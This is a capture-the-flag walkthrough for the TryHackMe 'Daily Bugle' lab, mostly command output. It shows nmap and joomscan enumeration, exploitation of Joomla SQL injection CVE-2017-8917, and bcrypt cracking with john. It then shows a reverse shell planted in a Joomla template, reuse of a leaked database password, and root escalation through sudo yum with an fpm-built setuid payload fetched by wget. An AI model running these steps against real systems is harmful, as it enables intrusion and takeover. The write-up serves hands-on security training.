Categories: walkthrough
Tags: tryhackme, thm, joomla, joomscan, sqli, CVE-2017-8917, hash-identifier, john-the-ripper, Linux-Machine, PrivEsc-Linux, PrivEsc, PrivEsc-sudo-l, yum, sudo-l
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 20:52 IST
Initiating Ping Scan at 20:52
Scanning 10.10.231.212 [2 ports]
Completed Ping Scan at 20:52, 0.37s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:52
Completed Parallel DNS resolution of 1 host. at 20:52, 0.06s elapsed
DNS resolution of 1 IPs took 0.06s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 20:52
Scanning 10.10.231.212 [3 ports]
Discovered open port 80/tcp on 10.10.231.212
Discovered open port 22/tcp on 10.10.231.212
Discovered open port 3306/tcp on 10.10.231.212
Completed Connect Scan at 20:52, 0.37s elapsed (3 total ports)
Nmap scan report for 10.10.231.212
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-04 20:52:41 IST for 1s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
3306/tcp open mysql syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.86 seconds
$ nmap -sV -sC -p22,80,3306 10.10.231.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 20:56 IST
Nmap scan report for 10.10.231.212
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.80 seconds
Username Enumeration - CVE-2018-15473
Input Forms
Both the forms are not vulnerable to SQLi
From Service scan, we got the server is running Joomla CMS
http-generator: Joomla! - Open Source Content Management
Lets check robots.txt
for disallowed entries
http-robots.txt: 15 disallowed entries
# If the Joomla site is installed within a folder
# eg www.example.com/joomla/ then the robots.txt file
# MUST be moved to the site root
# eg www.example.com/robots.txt
# AND the joomla folder name MUST be prefixed to all of the
# paths.
# eg the Disallow rule for the /administrator/ folder MUST
# be changed to read
# Disallow: /joomla/administrator/
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/orig.html
#
# For syntax checking, see:
# http://tool.motoricerca.info/robots-checker.phtml
User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
By Navigating to all the entries in robots.txt
.
we can only access /administrator/
directory which is login page for joomla
Let’s run the joomscan to get more information
$ joomscan -u http://10.10.231.212
By running joomscan we got the version of joomla as 3.7.0
Let’s check for any public exploits
Jooma 3.7.0 is vulnerable to SQLI - CVE-2017-8917
Exploit code:
By exploiting, we got username and hash
Extracting users from fb9j5_users
Found user ['811', 'Super User', 'jonah', '[email protected]', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
Let’s find hash .
hash-identifier
didn’t obtained the hash type.
Using hashcat
hash examples. we got that, it is a bcrypt hash
Let’s crack the hash
$ john --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123 (?)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 10.10.231.212
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-04 22:30 IST
Nmap scan report for 10.10.231.212
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
3306/tcp open mysql MariaDB (unauthorized)
|_mysql-empty-password: Host 'eu-west-1.compute.internal' is not allowed to connect to this MariaDB server
| mysql-enum:
| Accounts: No valid accounts found
|_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.98 seconds
Nothing much from mariadb
Lets login to joomla using the credentials obtained in enumeration phase
we are greeted with control panel
with search enginedorking, we can know that by manipulating the template in the Joomla control panel the access can be obtained
Navigate to Extensions> Templates > Templates in control panel
We have two templates.
Lets find what template is used by joomla
joomla is using protostar
template
In Protostar template, edit index.php with reverse shell code pentest monkey revshell Save it and reload the home page.
We got the shell
Spawning TTY
sh-4.2$ python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
bash-4.2$ ^Z
[1] + 5783 suspended nc -nlvp 9898
$ stty raw -echo; fg
[1] + 5783 continued nc -nlvp 9898
bash-4.2$ export TERM=xterm
bash-4.2$
we dont have access to jjameson home directory to get user flag.
bash-4.2$ ls -l /home
total 0
drwx------. 2 jjameson jjameson 99 Dec 15 2019 jjameson
This web server is configured with mariadb
database and to connect mariadb
to php there will be configuration file in web directory lets check it.
bash-4.2$ cd /var/www/html
bash-4.2$ ls
LICENSE.txt cli includes media tmp
README.txt components index.php modules web.config.txt
administrator configuration.php language plugins
bin htaccess.txt layouts robots.txt
cache images libraries templates
bash-4.2$ cat configuration.php
<?php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'The Daily Bugle';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = '20';
public $access = '1';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
public $dbprefix = 'fb9j5_';
public $live_site = '';
public $secret = 'UAMBRWzHO3oFPmVC';
public $gzip = '0';
[...snip...]
Using obtained database credentials
. Lets login to db for any juicy details
bash-4.2$ mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 305
Server version: 5.5.64-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databaes;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'databaes' at line 1
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
| mysql |
| performance_schema |
| test |
+--------------------+
5 rows in set (0.00 sec)
MariaDB [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| fb9j5_assets |
| fb9j5_associations |
| fb9j5_banner_clients |
| fb9j5_banner_tracks |
| fb9j5_banners |
|
[...snip...]
no juicy information obtained
Let’s use the same database password with users on target machine.
we got access for jjameson and user flag
Lets check for PrivEsc possibilities.
There is sudo permission for yum binary
Using information from gtfobins and fpm tool for escalating privileges
$ git clone https://github.com/jordansissel/fpm.git
$ cd fpm
$ sudo gem install fpm
$ sudo apt-get install rpm
$ printf '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod +s /tmp/bash' > root.sh
$ ls
bin CONTRIBUTORS fpm.gemspec Makefile README.rst templates
Brewfile Dockerfile Gemfile misc root.sh test
CHANGELOG.rst docs lib NOTES.md singularity.def Vagrantfile
CODE_OF_CONDUCT.md examples LICENSE notify-failure.sh spec
$ mkdir junk
$ fpm -n tmpbash -s dir -t rpm -a all --before-install ./root.sh ./junk -> here -n is 'packagename' -s is 'typeofinputfile' -t is 'outputpackage' -a 'architecture'
Created package {:path=>"tmpbash-1.0-1.noarch.rpm"}
$ ls
bin Dockerfile junk NOTES.md spec
Brewfile docs lib notify-failure.sh templates
CHANGELOG.rst examples LICENSE README.rst test
CODE_OF_CONDUCT.md fpm.gemspec Makefile root.sh tmpbash-1.0-1.noarch.rpm
CONTRIBUTORS Gemfile misc singularity.def Vagrantfile
$ python3 -m http.server 8991
Serving HTTP on 0.0.0.0 port 8991 (http://0.0.0.0:8991/) ...
Getting the root flag
wget http://<ip>:8991/tmpbash-1.0-1.noarch.rpm